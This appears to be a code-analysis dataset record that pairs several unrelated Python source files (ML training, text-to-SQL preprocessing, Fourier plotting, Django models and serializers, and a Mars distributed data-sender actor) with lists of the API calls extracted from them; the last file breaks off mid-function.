[((373, 442), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PGD based adversarial training"""'}), "(description='PGD based adversarial training')\n", (396, 442), False, 'import argparse\n'), ((1088, 1130), 'os.path.join', 'osp.join', (['args.result_path', '"""model.latest"""'], {}), "(args.result_path, 'model.latest')\n", (1096, 1130), True, 'import os.path as osp\n'), ((1158, 1198), 'os.path.join', 'osp.join', (['args.result_path', '"""model.best"""'], {}), "(args.result_path, 'model.best')\n", (1166, 1198), True, 'import os.path as osp\n'), ((1567, 1663), 'torchvision.datasets.CIFAR10', 'datasets.CIFAR10', ([], {'root': 'args.data_path', 'train': '(True)', 'download': '(True)', 'transform': 'transform_train'}), '(root=args.data_path, train=True, download=True, transform=\n transform_train)\n', (1583, 1663), False, 'from torchvision import datasets, transforms\n'), ((1673, 1769), 'torchvision.datasets.CIFAR10', 'datasets.CIFAR10', ([], {'root': 'args.data_path', 'train': '(False)', 'download': '(True)', 'transform': 'transform_test'}), '(root=args.data_path, train=False, download=True, transform\n =transform_test)\n', (1689, 1769), False, 'from torchvision import datasets, transforms\n'), ((1785, 1863), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'num_workers': '(2)'}), '(train_set, batch_size=args.batch_size, shuffle=True, num_workers=2)\n', (1795, 1863), False, 'from torch.utils.data import DataLoader\n'), ((1881, 1958), 'torch.utils.data.DataLoader', 'DataLoader', (['val_set'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': '(2)'}), '(val_set, batch_size=args.batch_size, shuffle=False, num_workers=2)\n', (1891, 1958), False, 'from torch.utils.data import DataLoader\n'), ((1977, 2029), 'model.WideResNet', 'WideResNet', ([], {'depth': '(28)', 'num_classes': '(10)', 'widen_factor': '(2)'}), '(depth=28, num_classes=10, widen_factor=2)\n', (1987, 2029), False, 'from model import WideResNet\n'), ((2092, 2120), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (2113, 2120), False, 'import torch\n'), ((2253, 2349), 'torch.optim.lr_scheduler.MultiStepLR', 'optim.lr_scheduler.MultiStepLR', (['optimizer'], {'milestones': 'args.lr_milestones', 'gamma': 'args.lr_step'}), '(optimizer, milestones=args.lr_milestones,\n gamma=args.lr_step)\n', (2283, 2349), True, 'import torch.optim as optim\n'), ((2360, 2396), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (['args.tensorboard_path'], {}), '(args.tensorboard_path)\n', (2373, 2396), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((2422, 2501), 'train.train_model', 'train_model', (['args', 'train_loader', 'val_loader', 'model', 'optimizer', 'schedule', 'writer'], {}), '(args, train_loader, val_loader, model, optimizer, schedule, writer)\n', (2433, 2501), False, 'from train import train_model\n'), ((1211, 1239), 'os.path.exists', 'osp.exists', (['args.result_path'], {}), '(args.result_path)\n', (1221, 1239), True, 'import os.path as osp\n'), ((1249, 1278), 'os.makedirs', 'os.makedirs', (['args.result_path'], {}), '(args.result_path)\n', (1260, 1278), False, 'import os\n'), ((1359, 1387), 'torchvision.transforms.RandomCrop', 'transforms.RandomCrop', (['(32)', '(4)'], {}), '(32, 4)\n', (1380, 1387), False, 'from torchvision import datasets, transforms\n'), ((1397, 1430), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (1428, 1430), False, 'from torchvision import datasets, transforms\n'), ((1440, 1461), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1459, 1461), False, 'from torchvision import datasets, transforms\n'), ((1520, 1541), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1539, 1541), False, 'from torchvision import datasets, transforms\n')]
|
import argparse
from igibson.examples.behavior.behavior_demo_batch import behavior_demo_batch
from igibson.metrics.agent import BehaviorRobotMetric
from igibson.metrics.disarrangement import KinematicDisarrangement, LogicalDisarrangement
from igibson.metrics.gaze import GazeMetric
from igibson.metrics.task import TaskMetric
def parse_args():
parser = argparse.ArgumentParser(description="Collect metrics from BEHAVIOR demos in manifest.")
parser.add_argument("demo_root", type=str, help="Directory containing demos listed in the manifest.")
parser.add_argument("log_manifest", type=str, help="Plain text file consisting of list of demos to replay.")
parser.add_argument("out_dir", type=str, help="Directory to store results in.")
return parser.parse_args()
def main():
args = parse_args()
def get_metrics_callbacks(**kwargs):
metrics = [
KinematicDisarrangement(),
LogicalDisarrangement(),
BehaviorRobotMetric(),
GazeMetric(),
TaskMetric(),
]
return (
[metric.start_callback for metric in metrics],
[metric.step_callback for metric in metrics],
[metric.end_callback for metric in metrics],
[metric.gather_results for metric in metrics],
)
behavior_demo_batch(args.demo_root, args.log_manifest, args.out_dir, get_metrics_callbacks)
if __name__ == "__main__":
main()
|
[
"igibson.metrics.disarrangement.LogicalDisarrangement",
"argparse.ArgumentParser",
"igibson.metrics.gaze.GazeMetric",
"igibson.metrics.disarrangement.KinematicDisarrangement",
"igibson.metrics.agent.BehaviorRobotMetric",
"igibson.examples.behavior.behavior_demo_batch.behavior_demo_batch",
"igibson.metrics.task.TaskMetric"
] |
[((360, 452), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Collect metrics from BEHAVIOR demos in manifest."""'}), "(description=\n 'Collect metrics from BEHAVIOR demos in manifest.')\n", (383, 452), False, 'import argparse\n'), ((1321, 1416), 'igibson.examples.behavior.behavior_demo_batch.behavior_demo_batch', 'behavior_demo_batch', (['args.demo_root', 'args.log_manifest', 'args.out_dir', 'get_metrics_callbacks'], {}), '(args.demo_root, args.log_manifest, args.out_dir,\n get_metrics_callbacks)\n', (1340, 1416), False, 'from igibson.examples.behavior.behavior_demo_batch import behavior_demo_batch\n'), ((894, 919), 'igibson.metrics.disarrangement.KinematicDisarrangement', 'KinematicDisarrangement', ([], {}), '()\n', (917, 919), False, 'from igibson.metrics.disarrangement import KinematicDisarrangement, LogicalDisarrangement\n'), ((933, 956), 'igibson.metrics.disarrangement.LogicalDisarrangement', 'LogicalDisarrangement', ([], {}), '()\n', (954, 956), False, 'from igibson.metrics.disarrangement import KinematicDisarrangement, LogicalDisarrangement\n'), ((970, 991), 'igibson.metrics.agent.BehaviorRobotMetric', 'BehaviorRobotMetric', ([], {}), '()\n', (989, 991), False, 'from igibson.metrics.agent import BehaviorRobotMetric\n'), ((1005, 1017), 'igibson.metrics.gaze.GazeMetric', 'GazeMetric', ([], {}), '()\n', (1015, 1017), False, 'from igibson.metrics.gaze import GazeMetric\n'), ((1031, 1043), 'igibson.metrics.task.TaskMetric', 'TaskMetric', ([], {}), '()\n', (1041, 1043), False, 'from igibson.metrics.task import TaskMetric\n')]
|
__all__ = ['cactus']
import os
import warnings
from pathlib import Path
import pytorch_lightning as pl
import wandb
from pytorch_lightning.loggers import WandbLogger
from unsupervised_meta_learning.cactus import *
from unsupervised_meta_learning.protonets import (CactusPrototypicalModel,
ProtoModule)
def cactus(
emb_data_dir: Path = None,
n_ways=20,
n_shots=1,
query=15,
batch_size=1,
epochs=300,
use_precomputed_partitions=False,
final_chkpt_name="final.chkpt",
final_chkpt_loc=os.getcwd(),
):
dm = CactusDataModule(
ways=n_ways,
shots=n_shots,
query=query,
use_precomputed_partitions=use_precomputed_partitions,
emb_data_dir=emb_data_dir,
)
model = ProtoModule(
encoder=CactusPrototypicalModel(in_channels=1, hidden_size=64),
num_classes=20,
lr=1e-3,
cactus_flag=True,
)
logger = WandbLogger(
project="protonet",
config={
"batch_size": batch_size,
"steps": 30000,
"dataset": "omniglot",
"cactus": True,
"pre-loaded-partitions": use_precomputed_partitions,
"partitions": 1,
"n_ways": n_ways,
"n_shots": n_shots,
"query_shots": query,
},
log_model=True,
)
trainer = pl.Trainer(
profiler="simple",
# max_steps=30_000,
max_epochs=epochs,
fast_dev_run=False,
gpus=1,
log_every_n_steps=25,
check_val_every_n_epoch=1,
flush_logs_every_n_steps=1,
num_sanity_val_steps=2,
logger=logger,
default_root_dir="/home/nfs/oshirekar/unsupervised_ml/cactus_chkpnts/",
checkpoint_callback=True,
)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
trainer.fit(model, datamodule=dm)
trainer.save_checkpoint(os.path.join(final_chkpt_loc, final_chkpt_name))
wandb.finish()
return 0
|
[
"pytorch_lightning.Trainer",
"warnings.simplefilter",
"wandb.finish",
"os.getcwd",
"pytorch_lightning.loggers.WandbLogger",
"unsupervised_meta_learning.protonets.CactusPrototypicalModel",
"warnings.catch_warnings",
"os.path.join"
] |
[((571, 582), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (580, 582), False, 'import os\n'), ((968, 1248), 'pytorch_lightning.loggers.WandbLogger', 'WandbLogger', ([], {'project': '"""protonet"""', 'config': "{'batch_size': batch_size, 'steps': 30000, 'dataset': 'omniglot', 'cactus':\n True, 'pre-loaded-partitions': use_precomputed_partitions, 'partitions':\n 1, 'n_ways': n_ways, 'n_shots': n_shots, 'query_shots': query}", 'log_model': '(True)'}), "(project='protonet', config={'batch_size': batch_size, 'steps': \n 30000, 'dataset': 'omniglot', 'cactus': True, 'pre-loaded-partitions':\n use_precomputed_partitions, 'partitions': 1, 'n_ways': n_ways,\n 'n_shots': n_shots, 'query_shots': query}, log_model=True)\n", (979, 1248), False, 'from pytorch_lightning.loggers import WandbLogger\n'), ((1401, 1707), 'pytorch_lightning.Trainer', 'pl.Trainer', ([], {'profiler': '"""simple"""', 'max_epochs': 'epochs', 'fast_dev_run': '(False)', 'gpus': '(1)', 'log_every_n_steps': '(25)', 'check_val_every_n_epoch': '(1)', 'flush_logs_every_n_steps': '(1)', 'num_sanity_val_steps': '(2)', 'logger': 'logger', 'default_root_dir': '"""/home/nfs/oshirekar/unsupervised_ml/cactus_chkpnts/"""', 'checkpoint_callback': '(True)'}), "(profiler='simple', max_epochs=epochs, fast_dev_run=False, gpus=1,\n log_every_n_steps=25, check_val_every_n_epoch=1,\n flush_logs_every_n_steps=1, num_sanity_val_steps=2, logger=logger,\n default_root_dir='/home/nfs/oshirekar/unsupervised_ml/cactus_chkpnts/',\n checkpoint_callback=True)\n", (1411, 1707), True, 'import pytorch_lightning as pl\n'), ((2025, 2039), 'wandb.finish', 'wandb.finish', ([], {}), '()\n', (2037, 2039), False, 'import wandb\n'), ((1833, 1858), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (1856, 1858), False, 'import warnings\n'), ((1868, 1899), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""'], {}), "('ignore')\n", (1889, 1899), False, 'import warnings\n'), ((1971, 2018), 'os.path.join', 'os.path.join', (['final_chkpt_loc', 'final_chkpt_name'], {}), '(final_chkpt_loc, final_chkpt_name)\n', (1983, 2018), False, 'import os\n'), ((825, 879), 'unsupervised_meta_learning.protonets.CactusPrototypicalModel', 'CactusPrototypicalModel', ([], {'in_channels': '(1)', 'hidden_size': '(64)'}), '(in_channels=1, hidden_size=64)\n', (848, 879), False, 'from unsupervised_meta_learning.protonets import CactusPrototypicalModel, ProtoModule\n')]
|
#coding=utf8
import os, json, pickle, argparse, sys, time
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from asdl.asdl import ASDLGrammar
from asdl.transition_system import TransitionSystem
from asdl.action_info import get_action_infos
from preprocess.common_utils import Preprocessor
def process_example(processor, entry, db, trans, verbose=False):
# preprocess raw tokens, schema linking and subgraph extraction
entry = processor.pipeline(entry, db, verbose=verbose)
# generate target output actions
ast = trans.surface_code_to_ast(entry['sql'])
actions = trans.get_actions(ast)
entry['ast'] = ast
entry['actions'] = get_action_infos(tgt_actions=actions)
return entry
def process_tables(processor, tables_list, output_path=None, verbose=False):
tables = {}
for each in tables_list:
if verbose:
print('*************** Processing database %s **************' % (each['db_id']))
tables[each['db_id']] = processor.preprocess_database(each, verbose=verbose)
print('In total, process %d databases .' % (len(tables)))
if output_path is not None:
pickle.dump(tables, open(output_path, 'wb'))
return tables
def process_dataset(processor, dataset, tables, output_path=None, skip_large=False, verbose=False):
from utils.constants import GRAMMAR_FILEPATH
grammar = ASDLGrammar.from_filepath(GRAMMAR_FILEPATH)
trans = TransitionSystem.get_class_by_lang('sql')(grammar)
processed_dataset = []
for idx, entry in enumerate(dataset):
if skip_large and len(tables[entry['db_id']]['column_names']) > 100: continue
if verbose:
print('*************** Processing %d-th sample **************' % (idx))
entry = process_example(processor, entry, tables[entry['db_id']], trans, verbose=verbose)
processed_dataset.append(entry)
print('In total, process %d samples , skip %d extremely large databases.' % (len(processed_dataset), len(dataset) - len(processed_dataset)))
if output_path is not None:
# serialize preprocessed dataset
pickle.dump(processed_dataset, open(output_path, 'wb'))
# for check preprocessed colab
# with open(os.path.join('/content/drive/MyDrive/Datasets/ratsql/datasets/vitext2sql_syllable_level/linegraph_out/processed_dataset.txt'), 'w', encoding='utf-8') as f:
# for text in processed_dataset:
# f.write(str(text) + '\n')
# for check preprocessed local
# with open(os.path.join('/content/drive/MyDrive/Datasets/ratsql/datasets/vitext2sql_syllable_level/linegraph_out/processed_dataset.txt'), 'w', encoding='utf-8') as f:
# for text in processed_dataset:
# f.write(str(text) + '\n')
return processed_dataset
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--db_dir', type=str, default='data/database')
arg_parser.add_argument('--dataset_path', type=str, required=True, help='dataset path')
arg_parser.add_argument('--raw_table_path', type=str, help='raw tables path')
arg_parser.add_argument('--table_path', type=str, required=True, help='processed table path')
arg_parser.add_argument('--output_path', type=str, required=True, help='output preprocessed dataset')
arg_parser.add_argument('--skip_large', action='store_true', help='whether skip large databases')
arg_parser.add_argument('--verbose', action='store_true', help='whether print processing information')
args = arg_parser.parse_args()
processor = Preprocessor(db_dir=args.db_dir, db_content=False)
# loading database and dataset
if args.raw_table_path:
# need to preprocess database items
tables_list = json.load(open(args.raw_table_path, 'r', encoding="utf8"))
print('Firstly, preprocess the original databases ...')
start_time = time.time()
tables = process_tables(processor, tables_list, args.table_path, args.verbose)
print('Databases preprocessing costs %.4fs .' % (time.time() - start_time))
else:
tables = pickle.load(open(args.table_path, 'rb'))
dataset = json.load(open(args.dataset_path, 'r', encoding="utf8"))
start_time = time.time()
dataset = process_dataset(processor, dataset, tables, args.output_path, args.skip_large, verbose=args.verbose)
print('Dataset preprocessing costs %.4fs .' % (time.time() - start_time))
|
[
"asdl.asdl.ASDLGrammar.from_filepath",
"preprocess.common_utils.Preprocessor",
"argparse.ArgumentParser",
"os.path.dirname",
"time.time",
"asdl.transition_system.TransitionSystem.get_class_by_lang",
"asdl.action_info.get_action_infos"
] |
[((662, 699), 'asdl.action_info.get_action_infos', 'get_action_infos', ([], {'tgt_actions': 'actions'}), '(tgt_actions=actions)\n', (678, 699), False, 'from asdl.action_info import get_action_infos\n'), ((1367, 1410), 'asdl.asdl.ASDLGrammar.from_filepath', 'ASDLGrammar.from_filepath', (['GRAMMAR_FILEPATH'], {}), '(GRAMMAR_FILEPATH)\n', (1392, 1410), False, 'from asdl.asdl import ASDLGrammar\n'), ((2838, 2863), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2861, 2863), False, 'import os, json, pickle, argparse, sys, time\n'), ((3578, 3628), 'preprocess.common_utils.Preprocessor', 'Preprocessor', ([], {'db_dir': 'args.db_dir', 'db_content': '(False)'}), '(db_dir=args.db_dir, db_content=False)\n', (3590, 3628), False, 'from preprocess.common_utils import Preprocessor\n'), ((4241, 4252), 'time.time', 'time.time', ([], {}), '()\n', (4250, 4252), False, 'import os, json, pickle, argparse, sys, time\n'), ((90, 115), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (105, 115), False, 'import os, json, pickle, argparse, sys, time\n'), ((1423, 1464), 'asdl.transition_system.TransitionSystem.get_class_by_lang', 'TransitionSystem.get_class_by_lang', (['"""sql"""'], {}), "('sql')\n", (1457, 1464), False, 'from asdl.transition_system import TransitionSystem\n'), ((3902, 3913), 'time.time', 'time.time', ([], {}), '()\n', (3911, 3913), False, 'import os, json, pickle, argparse, sys, time\n'), ((4419, 4430), 'time.time', 'time.time', ([], {}), '()\n', (4428, 4430), False, 'import os, json, pickle, argparse, sys, time\n'), ((4058, 4069), 'time.time', 'time.time', ([], {}), '()\n', (4067, 4069), False, 'import os, json, pickle, argparse, sys, time\n')]
|
import h5py
import numpy as np
import math
import matplotlib.pyplot as plt
# multiple h5 files?
f = h5py.File('shockwave.h5', 'r')
dset2 = f['2'] # fourier
k_density_re = dset2['k_density_re'][...]
k_density_im = dset2['k_density_im'][...]
kx = dset2['kx'][...]
tk = dset2['t'][...]
k_density = k_density_re + 1j * k_density_im
dset4 = f['4'] # constants
R = dset4['radius'][...]
Omega = dset4['omega'][...]
delta = dset4['d_omega'][...]
L = dset4['length'][...]
N = dset4['no_atoms'][...]
phi = dset4['phi'][...]
g = dset4['non_lin'][...]
A_psi = dset4['amplitude_psi'][...]
w_psi = dset4['width_psi'][...]
A = dset4['amplitude'][...]
w = dset4['width'][...]
T_imag = dset4['t_imag'][...]
T_evo = dset4['t_evo'][...]
def find_zero_gradient(f_mag, t, k_index):
f_2k = np.abs(f_mag[..., k_index])
max_indices = []
f_grad = np.gradient(f_2k)
for i in range(1, f_grad.shape[0] - 1):
if (abs(f_grad[i - 1]) > abs(f_grad[i]) < abs(f_grad[i + 1])) and (f_grad[i - 1] > 0 > f_grad[i + 1]):
max_indices.append(i)
return max_indices
# samples
imag_samples = 0
evo_samples = 1000
t_imag_start = 0
t_imag_end = t_imag_start + imag_samples
t_evo_start = 0
t_evo_end = t_evo_start + evo_samples - 1
k_dom = 4
k_half = int(kx.shape[0]/2)
k_index = k_half + k_dom
max_indices = find_zero_gradient(k_density, tk, k_index)
t_max = []
f_max = []
f_plats = []
for index in max_indices:
t_max.append(tk[index])
f_max.append(np.abs(k_density[index, k_index]))
f_plats.append(np.angle(k_density[index, k_index]))
start_index = 0
t_plat = []
plat_vals = []
for i in range(start_index, len(t_max)):
t_plat.append(t_max[i])
if f_plats[i] < 0:
plat_vals.append(f_plats[i] + math.pi)
else:
plat_vals.append(f_plats[i])
# plot fourier mag peaks matching plateaus
fig, (ax1, ax2) = plt.subplots(2, sharex=True)
fig.suptitle('Fourier transform (2k={}, '.format(str(round(kx[k_index], 4))) + r'$\Omega$' + '={})'.format(Omega))
ax1.plot(tk - T_imag, np.abs(k_density[..., k_index]))
ax1.plot(t_max - T_imag, f_max, 'r.')
ax1.set_ylabel(r'$|F_{2k}|$')
ax2.plot(tk - T_imag, np.angle(k_density[..., k_index]), label='phase')
ax2.plot(tk - T_imag, np.angle(k_density[..., k_index]) + math.pi, label='phase + ' + r'$\pi$')
ax2.plot(t_plat - T_imag, plat_vals, 'r.')
ax2.set_ylabel(r'$arg(F_{2k})$')
ax2.set_ylim([-math.pi, math.pi])
ax2.legend(loc='lower right')
ax2.set_yticks([-math.pi, -math.pi/2, 0, math.pi/2, math.pi])
ax2.set_yticklabels([r'$-\pi$', r'$-\frac{\pi}{2}$', '0', r'$\frac{\pi}{2}$', r'$\pi$'])
plt.xlabel('t')
fig.savefig('fourier_combined.png')
def phase_adjust(k):
phase = np.angle(k_density[..., k_half + k])
grad = np.gradient(phase)
t_phase = []
if not k % 2 == 0: # shift odd wavenumbers
phase = phase - math.pi/2
adjusted = []
for i in range(len(phase)):
if abs(grad[i]) < 0.005: # gradient threshold
if phase[i] < 0:
phase[i] += math.pi
if 0.1 < phase[i] < 2:
adjusted.append(phase[i])
t_phase.append(tk[i] - T_imag)
return t_phase, adjusted
# plot plateaus for different k
fig, ax = plt.subplots()
ax.plot(phase_adjust(2)[0], phase_adjust(2)[1], label='2k=2')
ax.plot(phase_adjust(3)[0], phase_adjust(3)[1], label='2k=3')
ax.plot(phase_adjust(4)[0], phase_adjust(4)[1], label='2k=4')
ax.plot(phase_adjust(5)[0], phase_adjust(5)[1], label='2k=5')
ax.plot(phase_adjust(6)[0], phase_adjust(6)[1], label='2k=6')
ax.set_xlabel('t')
ax.set_ylabel(r'$arg(F_{2k})$')
ax.set_ylim([0, math.pi])
ax.set_title('Fourier density phase (' + r'$\Omega$' + '={})'.format(Omega))
ax.legend()
plt.yticks([0, math.pi/4, math.pi/2, 3*math.pi/4, math.pi], ['0', r'$\frac{\pi}{4}$', r'$\frac{\pi}{2}$', r'$\frac{3\pi}{4}$', r'$\pi$'])
fig.savefig('fourier_phase.png')
fig, ax = plt.subplots()
ax.plot(tk - T_imag, np.abs(k_density[..., k_index]))
ax.plot(t_max - T_imag, f_max, 'r.')
ax.set_ylim([0, 1])
fig.savefig('fourier_peaks.png')
|
[
"h5py.File",
"numpy.abs",
"numpy.angle",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.subplots",
"numpy.gradient"
] |
[((101, 131), 'h5py.File', 'h5py.File', (['"""shockwave.h5"""', '"""r"""'], {}), "('shockwave.h5', 'r')\n", (110, 131), False, 'import h5py\n'), ((1842, 1870), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {'sharex': '(True)'}), '(2, sharex=True)\n', (1854, 1870), True, 'import matplotlib.pyplot as plt\n'), ((2568, 2583), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""t"""'], {}), "('t')\n", (2578, 2583), True, 'import matplotlib.pyplot as plt\n'), ((3184, 3198), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3196, 3198), True, 'import matplotlib.pyplot as plt\n'), ((3675, 3827), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[0, math.pi / 4, math.pi / 2, 3 * math.pi / 4, math.pi]', "['0', '$\\\\frac{\\\\pi}{4}$', '$\\\\frac{\\\\pi}{2}$', '$\\\\frac{3\\\\pi}{4}$', '$\\\\pi$']"], {}), "([0, math.pi / 4, math.pi / 2, 3 * math.pi / 4, math.pi], ['0',\n '$\\\\frac{\\\\pi}{4}$', '$\\\\frac{\\\\pi}{2}$', '$\\\\frac{3\\\\pi}{4}$', '$\\\\pi$'])\n", (3685, 3827), True, 'import matplotlib.pyplot as plt\n'), ((3857, 3871), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3869, 3871), True, 'import matplotlib.pyplot as plt\n'), ((776, 803), 'numpy.abs', 'np.abs', (['f_mag[..., k_index]'], {}), '(f_mag[..., k_index])\n', (782, 803), True, 'import numpy as np\n'), ((838, 855), 'numpy.gradient', 'np.gradient', (['f_2k'], {}), '(f_2k)\n', (849, 855), True, 'import numpy as np\n'), ((2008, 2039), 'numpy.abs', 'np.abs', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (2014, 2039), True, 'import numpy as np\n'), ((2131, 2164), 'numpy.angle', 'np.angle', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (2139, 2164), True, 'import numpy as np\n'), ((2654, 2690), 'numpy.angle', 'np.angle', (['k_density[..., k_half + k]'], {}), '(k_density[..., k_half + k])\n', (2662, 2690), True, 'import numpy as np\n'), ((2702, 2720), 'numpy.gradient', 'np.gradient', (['phase'], {}), '(phase)\n', (2713, 2720), True, 'import numpy as np\n'), ((3893, 3924), 'numpy.abs', 'np.abs', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (3899, 3924), True, 'import numpy as np\n'), ((1459, 1492), 'numpy.abs', 'np.abs', (['k_density[index, k_index]'], {}), '(k_density[index, k_index])\n', (1465, 1492), True, 'import numpy as np\n'), ((1513, 1548), 'numpy.angle', 'np.angle', (['k_density[index, k_index]'], {}), '(k_density[index, k_index])\n', (1521, 1548), True, 'import numpy as np\n'), ((2203, 2236), 'numpy.angle', 'np.angle', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (2211, 2236), True, 'import numpy as np\n')]
|
# Generated by Django 2.2.5 on 2020-01-15 12:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0047_auto_20200109_2243'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='publish',
),
migrations.AddField(
model_name='post',
name='state',
field=models.CharField(choices=[(-1, 'Draft'), (0, 'Queued'), (1, 'Publish')], default=-1, max_length=30),
),
]
|
[
"django.db.migrations.RemoveField",
"django.db.models.CharField"
] |
[((232, 289), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""post"""', 'name': '"""publish"""'}), "(model_name='post', name='publish')\n", (254, 289), False, 'from django.db import migrations, models\n'), ((430, 533), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[(-1, 'Draft'), (0, 'Queued'), (1, 'Publish')]", 'default': '(-1)', 'max_length': '(30)'}), "(choices=[(-1, 'Draft'), (0, 'Queued'), (1, 'Publish')],\n default=-1, max_length=30)\n", (446, 533), False, 'from django.db import migrations, models\n')]
|
import logging
from django.apps import apps
from django.conf import settings
from rest_framework import serializers
from zconnect.serializers import CreateDeviceSerializer, DeviceSerializer
from zconnect.models import Product
from .models import DemoDevice
logger = logging.getLogger(__name__)
class DemoDeviceSerializer(DeviceSerializer):
class Meta:
model = apps.get_model(settings.ZCONNECT_DEVICE_MODEL)
fields = ("id", "product", "name", "online", "last_seen", "fw_version",
"sensors_current", "orgs", "online", "sim_number", "created_at", "updated_at",
'online', 'sim_number',)
read_only_fields = ("id", "product", "orgs", "created_at", "updated_at",
'online', 'sim_number')
class CreateDemoDeviceSerializer(CreateDeviceSerializer):
class Meta:
model = DemoDevice
fields = ("id", "product", "name", "online", "last_seen", "fw_version",
"orgs", "online", "sim_number", "created_at", "updated_at",
'online', 'sim_number',)
read_only_fields = ("id", "created_at", "updated_at")
class DemoProductSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ("id", "version", "name", "iot_name", "sku", "manufacturer",
"url", "support_url", "previous_version", "periodic_data",
"periodic_data_interval_short", "periodic_data_num_intervals_short",
"periodic_data_interval_long", "periodic_data_num_intervals_long",
"periodic_data_retention_short", "server_side_events",
"battery_voltage_full", "battery_voltage_critical",
"battery_voltage_low", "created_at", "updated_at",)
read_only_fields = ("id", "created_at", "updated_at",)
|
[
"django.apps.apps.get_model",
"logging.getLogger"
] |
[((270, 297), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (287, 297), False, 'import logging\n'), ((378, 424), 'django.apps.apps.get_model', 'apps.get_model', (['settings.ZCONNECT_DEVICE_MODEL'], {}), '(settings.ZCONNECT_DEVICE_MODEL)\n', (392, 424), False, 'from django.apps import apps\n')]
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import operator
import logging
import sys
import time
from collections import defaultdict
from enum import Enum
from .. import promise
from ..config import options
from ..errors import DependencyMissing, ExecutionInterrupted, WorkerDead
from ..serialize import dataserializer
from ..scheduler.chunkmeta import WorkerMeta
from ..utils import log_unhandled, build_exc_info
from .events import EventContext, EventCategory, EventLevel, ProcedureEventType
from .storage import DataStorageDevice
from .utils import WorkerActor
logger = logging.getLogger(__name__)
class ReceiveStatus(Enum):
NOT_STARTED = 0
PENDING = 1
RECEIVING = 2
RECEIVED = 3
ERROR = 4
class EndpointTransferState(object):
"""
Structure providing transfer status in an endpoint
"""
__slots__ = 'parts', 'total_size', 'keys', 'end_marks', 'send_future'
def __init__(self):
self.reset()
self.send_future = None
def reset(self):
self.parts = []
self.total_size = 0
self.keys = []
self.end_marks = []
class SenderActor(WorkerActor):
"""
Actor handling sending data to ReceiverActors in other workers
"""
def __init__(self):
super().__init__()
self._dispatch_ref = None
self._events_ref = None
def post_create(self):
from .dispatcher import DispatchActor
from .events import EventsActor
super().post_create()
self._events_ref = self.ctx.actor_ref(EventsActor.default_uid())
if not self.ctx.has_actor(self._events_ref):
self._events_ref = None
self._dispatch_ref = self.promise_ref(DispatchActor.default_uid())
self._dispatch_ref.register_free_slot(self.uid, 'sender')
@promise.reject_on_exception
@log_unhandled
def send_data(self, session_id, chunk_keys, target_endpoints, ensure_cached=True,
compression=None, block_size=None, pin_token=None, timeout=None, callback=None):
"""
Send data to other workers
:param session_id: session id
:param chunk_keys: chunks to be sent
:param target_endpoints: endpoints to receive this chunk
:param ensure_cached: if True, make sure the data is in the shared storage of the target worker
:param compression: compression type when transfer in network
:param block_size: size of data block
:param pin_token: token to pin the data
:param timeout: timeout of data sending
:param callback: promise callback
"""
chunk_keys = list(chunk_keys)
target_endpoints = list(target_endpoints)
block_size = block_size or options.worker.transfer_block_size
data_sizes = self.storage_client.get_data_sizes(session_id, chunk_keys)
if any(s is None for s in data_sizes):
raise DependencyMissing('Dependencies %r not met when sending.'
% [k for k, s in zip(chunk_keys, data_sizes) if s is None])
compression = compression or dataserializer.CompressType(options.worker.transfer_compression)
wait_refs = []
addrs_to_chunks = dict()
keys_to_readers = dict()
receiver_refs = []
receiver_manager_ref_dict = dict(
(ep, self.promise_ref(ReceiverManagerActor.default_uid(), address=ep))
for ep in target_endpoints)
@log_unhandled
def _create_local_readers():
promises = []
for k in chunk_keys:
promises.append(self.storage_client.create_reader(
session_id, k, source_devices, packed=True, packed_compression=compression)
.then(functools.partial(operator.setitem, keys_to_readers, k)))
return promise.all_(promises)
@log_unhandled
def _create_remote_writers():
nonlocal data_sizes
create_write_promises = []
data_sizes = self.storage_client.get_data_sizes(session_id, chunk_keys)
for ref in receiver_manager_ref_dict.values():
# register transfer actions
create_write_promises.append(
